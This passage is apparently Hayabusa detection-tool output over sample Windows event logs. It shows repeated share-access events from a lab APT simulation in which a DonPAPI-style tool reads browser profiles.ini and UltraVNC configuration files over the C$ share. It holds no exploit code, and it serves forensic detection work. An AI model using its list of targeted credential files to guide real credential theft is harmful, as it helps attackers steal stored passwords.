0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:03.935 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\AppData\Roaming\Mozilla\icecat\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:03.935 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full 
extraction.evtx +2021-12-12 16:16:03.935 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:03.935 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:03.935 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:03.950 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\AppData\Roaming\Mozilla\Firefox\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:03.950 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini | IP Addr: 10.23.123.11 | LID: 
0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:03.950 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:03.950 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:03.950 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:03.950 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:03.968 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 
0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:03.969 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\AppData\Roaming\Comodo\IceDragon\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:03.970 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\AppData\Roaming\K-Meleon\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:03.970 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\AppData\Roaming\Mozilla\icecat\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:03.970 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\AppData\Roaming\Mozilla\Firefox\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 
16:16:03.970 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:03.970 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:03.970 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:03.986 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:03.986 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini | IP Addr: 10.23.123.11 | LID: 
0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:03.986 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\AppData\Roaming\Comodo\IceDragon\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:03.986 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:03.986 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:03.986 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:04.002 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\AppData\Roaming\K-Meleon\profiles.ini | IP Addr: 
10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:04.002 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\AppData\Roaming\Mozilla\icecat\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:04.002 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Roaming\Mozilla\Firefox\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:04.002 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:04.002 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:04.002 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: 
\??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:04.017 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:04.017 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:04.017 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Roaming\Comodo\IceDragon\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:04.017 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:04.017 
+09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:04.017 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:04.017 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:04.033 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Roaming\K-Meleon\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:04.033 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Roaming\Mozilla\icecat\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:04.033 
+09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\AppData\Roaming\Mozilla\Firefox\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:04.033 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:04.033 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:04.033 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:04.033 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 
+2021-12-12 16:16:04.049 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:04.049 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\AppData\Roaming\Comodo\IceDragon\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:04.049 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\AppData\Roaming\K-Meleon\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:04.049 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:04.049 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 
0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:04.049 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:04.049 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:04.064 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\AppData\Roaming\Mozilla\icecat\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:04.064 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: ProgramFiles(x86)\uvnc bvba\UltraVNC\ultravnc.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:04.064 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 
PROGRAMFILES\uvnc bvba\UltraVNC\ultravnc.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:04.064 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:04.064 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:04.064 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:04.080 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: PROGRAMFILES\UltraVNC\ultravnc.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:04.080 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 
ProgramFiles(x86)\UltraVNC\ultravnc.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:04.080 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Program Files (x86)\uvnc bvba\UltraVNC\ultravnc.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:04.080 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: PROGRAM FILES\uvnc bvba\UltraVNC\ultravnc.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:04.080 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:04.080 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:04.080 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | 
